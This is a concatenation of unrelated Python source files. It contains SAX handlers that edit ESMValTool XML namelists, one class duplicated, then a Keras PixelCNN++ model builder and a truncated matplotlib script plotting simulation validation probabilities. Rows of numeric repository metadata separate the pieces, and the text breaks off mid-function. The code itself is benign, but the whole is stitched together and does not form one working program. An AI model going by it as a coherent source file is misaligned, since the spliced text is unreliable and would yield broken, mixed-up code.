        """Set up the section store and the running text buffer."""
        self.namelist_sections = {"header": "", "diags": [], "footer": ""}
        self.str = ""
        self.attributes = None

    def startElement(self, name, attr):
        """Track section boundaries; re-emit other opening tags."""
        if name == "namelist":
            self.current_location = "header"
            self.str += '<namelist>'
        elif name == "diag":
            # the first <diag> closes off the header section
            if self.current_location == "header":
                self.namelist_sections["header"] = self.str
            self.str = '<diag>'
            self.current_location = "diag"
        else:
            pieces = [self.str, '<', name]
            if attr:
                pieces.extend(' %s="%s"' % (key, attr[key]) for key in attr.keys())
            pieces.append('>')
            self.str = ''.join(pieces)

    def characters(self, data):
        """Accumulate character data verbatim."""
        self.str += data

    def endElement(self, name):
        """Close tags, emitting completed sections as they finish."""
        if name == "diag":
            self.namelist_sections["diags"].append(self.str + '</diag>\n')
            self.str = ""
        elif name == "namelist":
            self.current_location = "footer"
            self.namelist_sections["footer"] = self.str + '</namelist>'
            self.str = ""
        else:
            self.str += '</%s>' % name
class addModels(xml.sax.handler.ContentHandler):
    """SAX handler that isolates the <MODELS> section of a namelist.

    After parsing, ``namelist_sections`` holds the text before
    <MODELS> ("header"), the serialized content inside <MODELS>
    ("MODELS"), and the remainder ("footer") — so model entries can be
    added between header and footer.
    """

    def __init__(self):
        """Set up the section store and the running text buffer."""
        self.namelist_sections = {"header": "", "MODELS": "", "footer": ""}
        self.str = ""
        self.attributes = None

    def startElement(self, name, attr):
        """Track section boundaries; re-emit other opening tags."""
        if name == "namelist":
            self.current_location = "header"
            self.str += '<namelist>'
        elif name == "MODELS":
            # entering <MODELS> finishes the header section
            if self.current_location == "header":
                self.namelist_sections["header"] = self.str
            self.str = ""
            self.current_location = "MODELS"
        else:
            parts = [self.str, '<', name]
            if attr:
                parts.extend(' %s="%s"' % (key, attr[key]) for key in attr.keys())
            parts.append('>')
            self.str = ''.join(parts)

    def characters(self, data):
        """Accumulate character data verbatim."""
        self.str += data

    def endElement(self, name):
        """Store finished sections; re-emit other closing tags."""
        if name == "MODELS":
            self.namelist_sections["MODELS"] = self.str
            self.str = ""
        elif name == "namelist":
            self.current_location = "footer"
            self.namelist_sections["footer"] = self.str + '</namelist>'
            self.str = ""
        else:
            self.str += '</%s>' % name
class setGlobal(xml.sax.handler.ContentHandler):
    """SAX handler that rewrites the text of selected elements.

    Rebuilds the whole document into ``self.str`` while substituting
    the text content of any element whose tag name appears in
    ``dict_repl`` with the mapped value.
    """

    def __init__(self, dict_repl):
        """Remember the tag-name -> replacement-text mapping."""
        self.dict_repl = dict_repl
        self.str = ""
        self.attributes = None
        self.current_tag = None

    def startElement(self, name, attr):
        """Re-emit the opening tag (with its attributes) verbatim."""
        fragment = [self.str, '<', name]
        if attr:
            fragment.extend(' %s="%s"' % (key, attr[key]) for key in attr.keys())
        fragment.append('>')
        self.str = ''.join(fragment)
        self.current_tag = name

    def characters(self, data):
        """Copy character data through unchanged."""
        self.str += data

    def endElement(self, name):
        """Close the tag, replacing the element text if it is mapped."""
        if name in self.dict_repl.keys():
            # drop everything after the last '>' and insert the replacement
            self.str = re.sub('(.*>).*$', r'\1' + self.dict_repl[name], self.str)
        self.str += '</%s>' % name
class addModel(xml.sax.handler.ContentHandler):
    """ @brief SAX handler class for parsing ESMValTool namelists

        SAX handler class for reading the ESMValTool XML-file and
        adding model to the <diag>-tag.  Everything up to (and
        including) the <variable> element whose text equals the target
        variable becomes the "header" section; the closing part of the
        document becomes the "footer".
    """
    def __init__(self, variable):
        """ @brief Initialize SAX namelist handler variables
            @param variable text of the <variable> element that marks
                   the end of the header section
        """
        ## The variable name to match against <variable> element text
        self.variable = variable
        ## A dictionary holding the data read from the XML-file
        self.namelist_sections = {}
        self.namelist_sections["header"] = ""
        self.namelist_sections["footer"] = ""
        self.str = ""
        self.attributes = None

    def startElement(self, name, attr):
        """ @brief default SAX startElement event handler
            @param name default SAX startElement argument
            @param attr default SAX startElement attribute
        """
        if name == "namelist":
            self.current_location = "header"
            self.str = self.str + '<namelist>'
        else:
            self.str = self.str + '<' + name
            if attr:
                for key in attr.keys():
                    self.str = self.str + " " + key + '="' + attr[key] + '"'
            self.str = self.str + '>'

    def characters(self, data):
        """Accumulate character data verbatim."""
        self.str = self.str + data

    def endElement(self, name):
        """ @brief default SAX endElement event handler
            @param name default SAX endElement argument
        """
        if name == "variable":
            self.str = self.str + '</' + name + '>'
            # Fix: raw string for the regex — '\s' inside a plain string
            # literal is an invalid escape sequence (a warning on modern
            # Pythons); the pattern itself is unchanged.
            # NOTE(review): the pattern requires whitespace between '>'
            # and the value; re.search returns None (AttributeError)
            # otherwise — confirm inputs always match.
            element_value = re.search(r'.*>\s+(.*)</variable>', self.str, re.DOTALL).group(1).strip()
            if self.variable == element_value:
                if len(self.namelist_sections["header"]) < 1:
                    self.namelist_sections["header"] = self.str
            self.str = ""  # reset after every </variable>, matched or not
        elif name == "namelist":
            self.current_location = "footer"
            self.namelist_sections["footer"] = self.str + '</namelist>'
            self.str = ""
        else:
            self.str = self.str + '</' + name + '>'
# NOTE(review): this class is a byte-for-byte duplicate of the setGlobal
# defined earlier in this module; being defined later, THIS definition is
# the one in effect at import time.  One of the two should be removed.
class setGlobal(xml.sax.handler.ContentHandler):
    """ @brief SAX handler class for parsing ESMValTool namelists
        SAX handler class for setting global settings the ESMValTool
        XML-file and adding models
    """
    def __init__(self, dict_repl):
        """ @brief Initialize SAX namelist handler variables
            @param dict_repl mapping of tag name -> replacement text
        """
        ## A dictionary holding the data read from the XML-file
        self.dict_repl = dict_repl
        self.str = ""          # running serialized document text
        self.attributes = None
        self.current_tag = None
    def startElement(self, name, attr):
        """ @brief default SAX startElement event handler
            @param name default SAX startElement argument
            @param attr default SAX startElement attribute
        """
        # re-emit the opening tag together with its attributes
        self.str = self.str + '<' + name
        if attr:
            for key in attr.keys():
                self.str = self.str + " " + key + '="' + attr[key] + '"'
        self.str = self.str + '>'
        self.current_tag = name
    def characters(self, data):
        # copy character data through unchanged
        self.str = self.str + data
    def endElement(self, name):
        """ @brief default SAX endElement event handler
            @param name default SAX endElement argument
        """
        if name in self.dict_repl.keys():
            # NOTE(review): the replacement value is used as a re.sub
            # template, so backslashes/'\1' in dict_repl values would be
            # interpreted — confirm values are plain strings.
            self.str = re.sub('(.*>).*$', r'\1' + self.dict_repl[name], self.str)
        self.str = self.str + '</' + name + '>'
| 35.015444
| 100
| 0.55607
| 985
| 9,069
| 5.04467
| 0.093401
| 0.121151
| 0.099618
| 0.104246
| 0.905615
| 0.891125
| 0.887905
| 0.887905
| 0.882673
| 0.882673
| 0
| 0.000654
| 0.325394
| 9,069
| 258
| 101
| 35.151163
| 0.81154
| 0.270041
| 0
| 0.807947
| 0
| 0
| 0.065576
| 0.003434
| 0
| 0
| 0
| 0
| 0
| 1
| 0.145695
| false
| 0
| 0.019868
| 0.006623
| 0.211921
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f1372a617355936ee73bad7f07c59d3284f903f0
| 13,974
|
py
|
Python
|
pixelcnn/pixelcnn_plus_plus.py
|
jrmylee/pixelcnn
|
77bf8eb43547bc8ff1e254d961d81141900c0a58
|
[
"MIT"
] | 2
|
2020-05-18T18:04:22.000Z
|
2020-05-18T19:00:11.000Z
|
pixelcnn/pixelcnn_plus_plus.py
|
jrmylee/pixelcnn
|
77bf8eb43547bc8ff1e254d961d81141900c0a58
|
[
"MIT"
] | 3
|
2020-01-27T02:47:02.000Z
|
2022-02-09T23:38:40.000Z
|
pixelcnn/pixelcnn_plus_plus.py
|
jrmylee/pixelcnn
|
77bf8eb43547bc8ff1e254d961d81141900c0a58
|
[
"MIT"
] | 2
|
2020-05-18T19:02:54.000Z
|
2021-12-02T07:07:03.000Z
|
"""Author: Brandon Trabucco, Copyright 2020, MIT License"""
from pixelcnn.gated_resnet import gated_resnet
from pixelcnn.ops import down_shifted_conv2d
from pixelcnn.ops import down_right_shifted_conv2d
from pixelcnn.ops import down_shifted_conv2d_transpose
from pixelcnn.ops import down_right_shifted_conv2d_transpose
from pixelcnn.ops import down_shift
from pixelcnn.ops import right_shift
from pixelcnn.ops import concat_elu
from tensorflow.keras import layers
from tensorflow.keras import models
import tensorflow as tf
def PixelCNNPlusPlus(
        output_size,
        image_height=32,
        image_width=32,
        image_is_discrete=True,
        num_modules=3,
        num_layers_per_module=6,
        filters=256,
        dropout_rate=0.1,
        **kwargs
):
    """Build a Pixel CNN ++ model in Keras.
    Args:
    - output_size: the cardinality of the output vector space.
    - image_height: the height of the images to generate.
    - image_width: the width of the images to generate.
    - image_is_discrete: a boolean that indicates whether
        the image is discrete or continuous features.
    - num_modules: the number of Residual Modules.
    - num_layers_per_module: the number of Gated Masked Conv2D layers
        per module.
    - filters: the number of filters in each Conv2D layer.
    - dropout_rate: the fraction of units to drop.
    - kwargs: forwarded to the convolution layers.
    Returns:
    - model: a Keras model that accepts one tf.int32 tensor
        with shape [batch_dim, image_height, image_width]
    """
    if image_is_discrete:
        images = layers.Input(shape=[image_height, image_width])
    else:
        # NOTE(review): continuous inputs are expected to already carry
        # `filters` channels — confirm against callers
        images = layers.Input(shape=[image_height, image_width, filters])
    #####################################################
    # Embed the discrete image pixels in a vector space #
    #####################################################
    def padding_backend(z):
        # appends one constant-1 channel on the last axis
        return tf.pad(
            z,
            [[0, 0], [0, 0], [0, 0], [0, 1]],
            constant_values=1)
    if image_is_discrete:
        images_embedding = layers.TimeDistributed(
            layers.Embedding(output_size, filters))(images)
    else:
        images_embedding = images
    images_embedding = layers.Lambda(padding_backend)(images_embedding)
    ##############################################
    # Prepare the image for shifted convolutions #
    ##############################################
    # two streams: `top` built from down-shifted convs, `top_left` from the
    # sum of a down-shifted and a right-shifted conv
    top_streams = [down_shift(
        down_shifted_conv2d(
            images_embedding, filters, kernel_size=(2, 3)))]
    initial_top_left_stream_a = down_shift(
        down_shifted_conv2d(
            images_embedding, filters, kernel_size=(1, 3)))
    initial_top_left_stream_b = right_shift(
        down_right_shifted_conv2d(
            images_embedding, filters, kernel_size=(2, 1)))
    top_left_streams = [
        layers.add([initial_top_left_stream_a, initial_top_left_stream_b])]
    ######################################################
    # Downsample with Residual Gated Masked Convolutions #
    ######################################################
    # every intermediate output is kept in the stream lists so the
    # upsampling pass below can pop them as skip connections
    for block in range(num_modules):
        for layer in range(num_layers_per_module):
            top_streams.append(gated_resnet(
                top_streams[-1],
                conv2d=down_shifted_conv2d,
                nonlinearity=concat_elu,
                kernel_size=(2, 3),
                dropout_rate=dropout_rate,
                **kwargs))
            top_left_streams.append(gated_resnet(
                top_left_streams[-1],
                a=top_streams[-1],
                conv2d=down_right_shifted_conv2d,
                nonlinearity=concat_elu,
                kernel_size=(2, 2),
                dropout_rate=dropout_rate,
                **kwargs))
        # strided convs between modules (skipped after the last module)
        if block < num_modules - 1:
            top_streams[-1] = down_shifted_conv2d(
                top_streams[-1],
                filters,
                (2, 3),
                strides=(2, 2),
                **kwargs)
            top_left_streams[-1] = down_right_shifted_conv2d(
                top_left_streams[-1],
                filters,
                (2, 2),
                strides=(2, 2),
                **kwargs)
    ####################################################
    # Upsample with Residual Gated Masked Convolutions #
    ####################################################
    top = top_streams.pop()
    top_left = top_left_streams.pop()
    for block in reversed(range(num_modules)):
        if block < num_modules - 1:
            top = down_shifted_conv2d_transpose(
                top,
                filters,
                (2, 3),
                strides=(2, 2),
                **kwargs)
            top_left = down_right_shifted_conv2d_transpose(
                top_left,
                filters,
                (2, 2),
                strides=(2, 2),
                **kwargs)
        # pop the matching downsample outputs as skip connections
        for layer in range(num_layers_per_module):
            top = gated_resnet(
                top,
                a=top_streams.pop(),
                conv2d=down_shifted_conv2d,
                nonlinearity=concat_elu,
                kernel_size=(2, 3),
                dropout_rate=dropout_rate,
                **kwargs)
            top_left = gated_resnet(
                top_left,
                a=layers.concatenate([top, top_left_streams.pop()]),
                conv2d=down_right_shifted_conv2d,
                nonlinearity=concat_elu,
                kernel_size=(2, 2),
                dropout_rate=dropout_rate,
                **kwargs)
    #################################################
    # Compute logits for every image pixel location #
    #################################################
    top_left = concat_elu(top_left)
    # 1x1 conv maps features to per-pixel logits over `output_size` values
    logits = layers.Conv2D(
        output_size,
        (1, 1),
        strides=(1, 1),
        padding='valid',
        data_format='channels_last',
        **kwargs)(top_left)
    return models.Model(inputs=[images], outputs=logits)
def ConditionalPixelCNNPlusPlus(
output_size,
conditional_vector_size,
image_height=32,
image_width=32,
image_is_discrete=True,
conditional_height=1,
conditional_width=1,
class_conditional=True,
num_classes=None,
num_preprocess_layers=5,
num_modules=3,
num_layers_per_module=6,
filters=256,
dropout_rate=0.1,
**kwargs
):
"""Build a Conditional Pixel CNN ++ model in Keras.
Args:
- output_size: the cardinality of the output vector space.
- conditional_vector_size: the cardinality of the vector space
for conditioning image generation.
- image_height: the height of the images to generate.
- image_width: the width of the images to generate.
- image_is_discrete: a boolean that indicates whether
the image is discrete or continuous features.
- conditional_height: the height of the conditional input.
- conditional_width: the width of the conditional input.
- class_conditional: a boolean that indicates that
the conditional inputs are class labels.
- num_classes: an integer that determines the number
of unique classes to condition on.
- num_preprocess_layers: the number of Conv2DTranspose layers
for upsampling the conditional input.
- num_modules: the number of Residual Modules.
- num_layers: the number of Gated Masked Conv2D layers
per module.
- filters: the number of filters iun each Conv2D layer.
- dropout_rate: the fraction of units to drop.
Returns:
- model: a Keras model that accepts one tf.int32 tensor
with shape [batch_dim, image_height, image_width] and
with shape [batch_dim, conditional_height,
conditional_width, conditional_vector_size]
"""
if image_is_discrete:
images = layers.Input(shape=[image_height, image_width])
else:
images = layers.Input(shape=[image_height, image_width, filters])
if class_conditional:
inputs = layers.Input(shape=[conditional_height, conditional_width])
else:
inputs = layers.Input(shape=[
conditional_height, conditional_width, conditional_vector_size])
#####################################################
# Upsample the conditional inputs to the image size #
#####################################################
conditional_embedding = [inputs]
if class_conditional:
conditional_embedding[-1] = layers.TimeDistributed(
layers.Embedding(
num_classes, conditional_vector_size))(conditional_embedding[-1])
for i in range(num_preprocess_layers):
x = conditional_embedding[-1]
if i > 0:
x = concat_elu(x)
conditional_embedding.append(layers.Conv2DTranspose(
filters,
(5, 5),
strides=(2, 2),
padding='same',
data_format='channels_last',
**kwargs)(x))
#####################################################
# Embed the discrete image pixels in a vector space #
#####################################################
def padding_backend(z):
return tf.pad(
z,
[[0, 0], [0, 0], [0, 0], [0, 1]],
constant_values=1)
if image_is_discrete:
images_embedding = layers.TimeDistributed(
layers.Embedding(output_size, filters))(images)
else:
images_embedding = images
images_embedding = layers.Lambda(padding_backend)(images_embedding)
##############################################
# Prepare the image for shifted convolutions #
##############################################
top_streams = [down_shift(
down_shifted_conv2d(
images_embedding, filters, kernel_size=(2, 3)))]
initial_top_left_stream_a = down_shift(
down_shifted_conv2d(
images_embedding, filters, kernel_size=(1, 3)))
initial_top_left_stream_b = right_shift(
down_right_shifted_conv2d(
images_embedding, filters, kernel_size=(2, 1)))
top_left_streams = [
layers.add([
initial_top_left_stream_a, initial_top_left_stream_b])]
######################################################
# Downsample with Residual Gated Masked Convolutions #
######################################################
for block in range(num_modules):
for layer in range(num_layers_per_module):
top_streams.append(gated_resnet(
top_streams[-1],
h=conditional_embedding[-(block + 1)],
conv2d=down_shifted_conv2d,
nonlinearity=concat_elu,
kernel_size=(2, 3),
dropout_rate=dropout_rate,
**kwargs))
top_left_streams.append(gated_resnet(
top_left_streams[-1],
a=top_streams[-1],
h=conditional_embedding[-(block + 1)],
conv2d=down_right_shifted_conv2d,
nonlinearity=concat_elu,
kernel_size=(2, 2),
dropout_rate=dropout_rate,
**kwargs))
if block < num_modules - 1:
top_streams[-1] = down_shifted_conv2d(
top_streams[-1],
filters,
(2, 3),
strides=(2, 2),
**kwargs)
top_left_streams[-1] = down_right_shifted_conv2d(
top_left_streams[-1],
filters,
(2, 2),
strides=(2, 2),
**kwargs)
####################################################
# Upsample with Residual Gated Masked Convolutions #
####################################################
top = top_streams.pop()
top_left = top_left_streams.pop()
for block in reversed(range(num_modules)):
if block < num_modules - 1:
top = down_shifted_conv2d_transpose(
top,
filters,
(2, 3),
strides=(2, 2),
**kwargs)
top_left = down_right_shifted_conv2d_transpose(
top_left,
filters,
(2, 2),
strides=(2, 2),
**kwargs)
for layer in range(num_layers_per_module):
top = gated_resnet(
top,
a=top_streams.pop(),
h=conditional_embedding[-(block + 1)],
conv2d=down_shifted_conv2d,
nonlinearity=concat_elu,
kernel_size=(2, 3),
dropout_rate=dropout_rate,
**kwargs)
top_left = gated_resnet(
top_left,
a=layers.concatenate([top, top_left_streams.pop()]),
h=conditional_embedding[-(block + 1)],
conv2d=down_right_shifted_conv2d,
nonlinearity=concat_elu,
kernel_size=(2, 2),
dropout_rate=dropout_rate,
**kwargs)
#################################################
# Compute logits for every image pixel location #
#################################################
top_left = concat_elu(top_left)
logits = layers.Conv2D(
output_size,
(1, 1),
strides=(1, 1),
padding='valid',
data_format='channels_last',
**kwargs)(top_left)
return models.Model(inputs=[images, inputs], outputs=logits)
| 33.917476
| 82
| 0.521898
| 1,395
| 13,974
| 4.960573
| 0.116846
| 0.038439
| 0.034393
| 0.03815
| 0.838873
| 0.818497
| 0.818497
| 0.798555
| 0.762139
| 0.762139
| 0
| 0.020267
| 0.325605
| 13,974
| 411
| 83
| 34
| 0.714028
| 0.181194
| 0
| 0.850575
| 0
| 0
| 0.005463
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015326
| false
| 0
| 0.042146
| 0.007663
| 0.072797
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f137b80e405c15ba58855ca3ca394df1d3231139
| 150,492
|
py
|
Python
|
bin/plot_validation_sim_results.py
|
phyletica/ecoevolity-experiments
|
bb16e34c4c7495feaa68653df98d5fbead93cf44
|
[
"CC-BY-4.0"
] | null | null | null |
bin/plot_validation_sim_results.py
|
phyletica/ecoevolity-experiments
|
bb16e34c4c7495feaa68653df98d5fbead93cf44
|
[
"CC-BY-4.0"
] | null | null | null |
bin/plot_validation_sim_results.py
|
phyletica/ecoevolity-experiments
|
bb16e34c4c7495feaa68653df98d5fbead93cf44
|
[
"CC-BY-4.0"
] | null | null | null |
#! /usr/bin/env python
import sys
import os
import re
import math
import glob
import logging
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG)
_LOG = logging.getLogger(os.path.basename(__file__))
import pycoevolity
import project_util
import matplotlib as mpl
# Use TrueType (42) fonts rather than Type 3 fonts
mpl.rcParams["pdf.fonttype"] = 42
mpl.rcParams["ps.fonttype"] = 42
# Render all plot text with LaTeX (sans-serif math via the sfmath package)
# so figure typography matches the manuscript.
tex_font_settings = {
    "text.usetex": True,
    "font.family": "sans-serif",
    # "font.serif": [
    #         "Computer Modern Roman",
    #         "Times",
    #         ],
    # "font.sans-serif": [
    #         "Computer Modern Sans serif",
    #         "Helvetica",
    #         ],
    # "font.cursive": [
    #         "Zapf Chancery",
    #         ],
    # "font.monospace": [
    #         "Computer Modern Typewriter",
    #         "Courier",
    #         ],
    # NOTE(review): a list-valued "text.latex.preamble" is accepted by older
    # matplotlib releases; newer releases expect a single string — confirm
    # the pinned matplotlib version before upgrading.
    "text.latex.preamble" : [
        "\\usepackage[T1]{fontenc}",
        "\\usepackage[cm]{sfmath}",
    ]
}
mpl.rcParams.update(tex_font_settings)
import matplotlib.pyplot as plt
from matplotlib import gridspec
def get_standardized_partiton(element_vector):
    """Map a sequence of arbitrary labels to a canonical integer partition.

    Each distinct element is assigned the next integer index in order of
    first appearance, so e.g. ``["b", "a", "b"]`` -> ``[0, 1, 0]``.

    Parameters
    ----------
    element_vector : iterable of hashable
        The labels to standardize.

    Returns
    -------
    list of int
        The standardized partition, same length as `element_vector`.
    """
    el_map = {}
    next_idx = 0
    partition = []
    for el in element_vector:
        # `dict.has_key` (used previously) was removed in Python 3;
        # the `in` operator works on both Python 2 and 3.
        if el not in el_map:
            el_map[el] = next_idx
            next_idx += 1
        partition.append(el_map[el])
    return partition
def get_standardized_partiton_str(element_vector):
    """Return the standardized partition of `element_vector` as a digit string."""
    indices = get_standardized_partiton(element_vector)
    return "".join(str(idx) for idx in indices)
def get_nevents_probs(
        nevents = 1,
        sim_dir = "03pairs-dpp-root-0100-100k",
        variable_only = False):
    """Collect (posterior probability, correct?) pairs for `nevents` events.

    Reads every batch's results spreadsheet under `sim_dir` (within
    `project_util.VAL_DIR`) and returns a list of tuples pairing the
    estimated posterior probability of `nevents` divergence events with
    a 0/1 flag for whether `nevents` was the true number.
    """
    results_file_name = "results.csv.gz"
    if variable_only:
        results_file_name = "var-only-results.csv.gz"
    results_paths = sorted(glob.glob(os.path.join(
            project_util.VAL_DIR,
            sim_dir,
            "batch*",
            results_file_name)))
    prob_key = "num_events_{0}_p".format(nevents)
    probs = []
    for row in pycoevolity.parsing.spreadsheet_iter(results_paths):
        was_correct = int(int(row["true_num_events"]) == nevents)
        probs.append((float(row[prob_key]), was_correct))
    return probs
def bin_prob_correct_tuples(probability_correct_tuples, nbins = 20):
    """Bin (probability, was-correct) tuples into `nbins` equal-width bins.

    Parameters
    ----------
    probability_correct_tuples : iterable of (float, int)
        Pairs of an estimated posterior probability in [0, 1] and a 0/1
        flag for whether the associated estimate was correct.
    nbins : int
        Number of equal-width bins spanning [0, 1].

    Returns
    -------
    (bins, est_true_tups)
        `bins` is a list of `nbins` lists of the input tuples; `est_true_tups`
        pairs each bin's mean estimated probability with the bin's observed
        proportion correct.

    Notes
    -----
    A bin with no tuples raises ``ZeroDivisionError`` when the bin means
    are computed (unchanged from the original behavior).
    """
    # Upper edges of the bins: 1/nbins, 2/nbins, ..., 1.0 — the same values
    # get_sequence_iter(0.0, 1.0, nbins + 1)[1:] produces, computed inline so
    # this function is self-contained.
    edge_step = (1.0 - 0.0) / float(nbins)
    bin_upper_limits = [0.0 + (i * edge_step) for i in range(1, nbins + 1)]
    bins = [[] for _ in range(nbins)]
    n = 0
    for (p, t) in probability_correct_tuples:
        n += 1
        for i, limit in enumerate(bin_upper_limits):
            if p < limit:
                bins[i].append((p, t))
                break
        else:
            # p >= 1.0 (i.e. at or above the top edge): put it in the last bin.
            bins[-1].append((p, t))
    assert sum(len(b) for b in bins) == n
    assert len(bins) == nbins
    est_true_tups = []
    for b in bins:
        # Summarize each bin by its mean estimated probability (rather than
        # the bin midpoint) and the observed proportion correct.
        ests = [p for (p, t) in b]
        est = sum(ests) / float(len(ests))
        correct = [t for (p, t) in b]
        true = sum(correct) / float(len(correct))
        est_true_tups.append((est, true))
    return bins, est_true_tups
def get_nevents_estimated_true_probs(
        nevents = 1,
        sim_dir = "03pairs-dpp-root-0100-100k",
        variable_only = False,
        nbins = 20):
    """Parse and bin posterior-probability results for `nevents` events.

    Returns the `(bins, est_true_tups)` pair from
    `bin_prob_correct_tuples`, logging progress along the way.
    """
    if variable_only:
        _LOG.info("Parsing num_events results for {0} (variable only)".format(sim_dir))
    else:
        _LOG.info("Parsing num_events results for {0} (all sites)".format(sim_dir))
    parsed_probs = get_nevents_probs(
            nevents = nevents,
            sim_dir = sim_dir,
            variable_only = variable_only)
    _LOG.info("\tparsed results for {0} simulations".format(len(parsed_probs)))
    bins, tups = bin_prob_correct_tuples(parsed_probs, nbins = nbins)
    bin_sizes = ", ".join(str(len(b)) for b in bins)
    _LOG.info("\tbin sample sizes: {0}".format(bin_sizes))
    return bins, tups
def _draw_est_vs_true_panel(ax, est_true_probs, bins, title):
    """Draw one estimated-vs-true probability panel on `ax`.

    Scatters binned (estimated, true) probability pairs, annotates each
    point with its bin's sample size, titles the panel, and adds a gray
    1:1 identity line.
    """
    x = [e for (e, t) in est_true_probs]
    y = [t for (e, t) in est_true_probs]
    sample_sizes = [len(b) for b in bins]
    line, = ax.plot(x, y)
    plt.setp(line,
            marker = 'o',
            markerfacecolor = 'none',
            markeredgecolor = '0.35',
            markeredgewidth = 0.7,
            markersize = 3.5,
            linestyle = '',
            zorder = 100,
            rasterized = False)
    ax.set_xlim(0.0, 1.0)
    ax.set_ylim(0.0, 1.0)
    for i, (label, lx, ly) in enumerate(zip(sample_sizes, x, y)):
        # Nudge the first/last labels inward so they stay inside the axes.
        if i == 0:
            offset, ha, va = (1, 1), "left", "bottom"
        elif i == len(x) - 1:
            offset, ha, va = (-1, -1), "right", "top"
        else:
            offset, ha, va = (-1, 1), "right", "bottom"
        ax.annotate(
                str(label),
                xy = (lx, ly),
                xytext = offset,
                textcoords = "offset points",
                horizontalalignment = ha,
                verticalalignment = va)
    ax.set_title(title)
    identity_line, = ax.plot(
            [0.0, 1.0],
            [0.0, 1.0])
    plt.setp(identity_line,
            color = '0.8',
            linestyle = '-',
            linewidth = 1.0,
            marker = '',
            zorder = 0)

def _finalize_est_true_axes(fig):
    """Hide interior ticks/labels and doubled spines on a shared-axis grid.

    NOTE(review): `Axes.is_last_row`/`is_first_col`/`is_first_row` are
    deprecated in newer matplotlib (use `ax.get_subplotspec()`); kept here
    to match the rest of this file — confirm the pinned matplotlib version.
    """
    # Show only the outside ticks.
    for ax in fig.get_axes():
        if not ax.is_last_row():
            ax.set_xticks([])
        if not ax.is_first_col():
            ax.set_yticks([])
    # Show tick labels only for the lower-left plot.
    for ax in fig.get_axes():
        if ax.is_last_row() and ax.is_first_col():
            continue
        ax.set_xticklabels(["" for item in ax.get_xticklabels()])
        ax.set_yticklabels(["" for item in ax.get_yticklabels()])
    # Avoid doubled spines between adjacent panels: bottom/right always on,
    # top/left only on the first row/column.
    for ax in fig.get_axes():
        for sp in ax.spines.values():
            sp.set_visible(False)
            sp.set_linewidth(2)
        if ax.is_first_row():
            ax.spines['top'].set_visible(True)
        ax.spines['bottom'].set_visible(True)
        if ax.is_first_col():
            ax.spines['left'].set_visible(True)
        ax.spines['right'].set_visible(True)

def plot_nevents_estimated_vs_true_probs(
        nevents = 1,
        sim_dir = "03pairs-dpp-root-0100-100k",
        nbins = 20,
        plot_file_prefix = "",
        include_unlinked_only = False):
    """Plot binned estimated vs. true probabilities of `nevents` events.

    Draws side-by-side panels for all-sites and variable-only results
    (plus unlinked-only when `include_unlinked_only` is True, using the
    sibling "...0ul" sim dir) and writes a PDF into
    `project_util.VAL_DIR/plots`.
    """
    bins, est_true_probs = get_nevents_estimated_true_probs(
            nevents = nevents,
            sim_dir = sim_dir,
            variable_only = False,
            nbins = nbins)
    vo_bins, vo_est_true_probs = get_nevents_estimated_true_probs(
            nevents = nevents,
            sim_dir = sim_dir,
            variable_only = True,
            nbins = nbins)
    if include_unlinked_only:
        uo_bins, uo_est_true_probs = get_nevents_estimated_true_probs(
                nevents = nevents,
                sim_dir = sim_dir.replace("0l", "0ul"),
                variable_only = False,
                nbins = nbins)
    plt.close('all')
    if include_unlinked_only:
        fig = plt.figure(figsize = (7.5, 2.5))
        ncols = 3
    else:
        fig = plt.figure(figsize = (5.2, 2.5))
        ncols = 2
    nrows = 1
    gs = gridspec.GridSpec(nrows, ncols,
            wspace = 0.0,
            hspace = 0.0)
    # First panel (all sites) also carries the shared y label and the
    # figure-wide x label (centered across all panels via axis coords).
    ax = plt.subplot(gs[0, 0])
    _draw_est_vs_true_panel(ax, est_true_probs, bins, "All sites")
    ax.set_ylabel("True probability", size = 14.0)
    x_label_center = 1.5 if include_unlinked_only else 1.0
    ax.text(x_label_center, -0.14,
            "Posterior probability of one divergence",
            horizontalalignment = "center",
            verticalalignment = "top",
            size = 14.0)
    ax = plt.subplot(gs[0, 1])
    _draw_est_vs_true_panel(ax, vo_est_true_probs, vo_bins, "Variable only")
    if include_unlinked_only:
        ax = plt.subplot(gs[0, 2])
        _draw_est_vs_true_panel(ax, uo_est_true_probs, uo_bins, "Unlinked only")
    _finalize_est_true_axes(fig)
    gs.update(left = 0.10, right = 0.995, bottom = 0.18, top = 0.91)
    plot_dir = os.path.join(project_util.VAL_DIR, "plots")
    if not os.path.exists(plot_dir):
        os.mkdir(plot_dir)
    plot_file_name = "est-vs-true-prob-nevent-1.pdf"
    if plot_file_prefix:
        plot_file_name = plot_file_prefix + "-" + plot_file_name
    plot_path = os.path.join(plot_dir,
            plot_file_name)
    plt.savefig(plot_path)
    _LOG.info("Plots written to {0!r}\n".format(plot_path))
def get_sequence_iter(start = 0.0, stop = 1.0, n = 10):
    """Return a generator of `n` evenly spaced values from `start` to `stop`.

    The endpoints are included; `stop` must exceed `start`.
    """
    assert(stop > start)
    increment = (stop - start) / float(n - 1)
    return (start + (idx * increment) for idx in range(n))
def truncate_color_map(cmap, min_val = 0.0, max_val = 10, n = 100):
    """Return a new colormap sampling `cmap` over [min_val, max_val].

    Samples `n` evenly spaced points from the parent colormap and builds
    a LinearSegmentedColormap from them.
    """
    sample_points = list(get_sequence_iter(min_val, max_val, n))
    truncated_name = 'trunc({n},{a:.2f},{b:.2f})'.format(
            n = cmap.name,
            a = min_val,
            b = max_val)
    return mpl.colors.LinearSegmentedColormap.from_list(
            truncated_name,
            cmap(sample_points))
def get_root_gamma_parameters(root_alpha_string):
    """Convert a shape string to (shape, scale) for a mean-1.0 gamma prior."""
    shape = float(root_alpha_string)
    return shape, 1.0 / shape
def get_errors(values, lowers, uppers):
    """Return [lower-error, upper-error] lists for pyplot-style error bars.

    All three sequences must be the same length; errors are the distances
